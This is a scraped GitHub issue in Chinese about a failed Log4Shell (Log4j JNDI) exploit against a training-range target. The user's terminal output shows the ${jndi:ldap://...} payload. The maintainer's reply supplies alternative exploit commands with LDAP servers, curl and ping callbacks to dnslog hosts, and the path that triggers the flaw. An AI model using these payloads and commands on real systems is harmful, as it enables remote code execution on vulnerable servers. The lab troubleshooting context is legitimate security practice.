We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Log4j 靶场漏洞检测失败
[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/ [-] LDAP Listening on 0.0.0.0:8088 [-] payload: ${jndi:ldap://82.156.13.32:8088/xobject} [-] start exploit. waiting... [-] exploit fail and exit. [root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/ [-] LDAP Listening on 0.0.0.0:8088 [-] payload: ${jndi:ldap://82.156.13.32:8088/xobject} [-] start exploit. waiting... [-] exploit fail and exit.
The text was updated successfully, but these errors were encountered:
默认的这个,只加了部分场景和最常见的payload利用方式,如果不成功, 启动下jndi服务,然后burp发下http请求尝试 java -cp jndi_tool.jar jndi.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp jndi_tool.jar jndi.LDAPRefServer 1099 , 靶场这个,是需要路径触发的,可以这样: java -cp jndi_tool.jar jndi.log4j.HLDAPLog4j 121.40.166.141 80 "ping jnoizd.dnslog.cn" http://d63bb2586.lab.aqlab.cn/zkaq/log4jrce w=tomcat
返回 jnoizd.dnslog.cn | 59.63.230.105 | 2021-12-20 10:15:18
Sorry, something went wrong.
No branches or pull requests
Log4j 靶场漏洞检测失败
[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.
[root@VM-8-12-centos JNDIExploit]# java -cp JNDIExploit.jar jndi.log4j.HLDAPLog4j 82.156.13.32 8088 "whoami" http://d63bb2586.lab.aqlab.cn/
[-] LDAP Listening on 0.0.0.0:8088
[-] payload: ${jndi:ldap://82.156.13.32:8088/xobject}
[-] start exploit. waiting...
[-] exploit fail and exit.
The text was updated successfully, but these errors were encountered: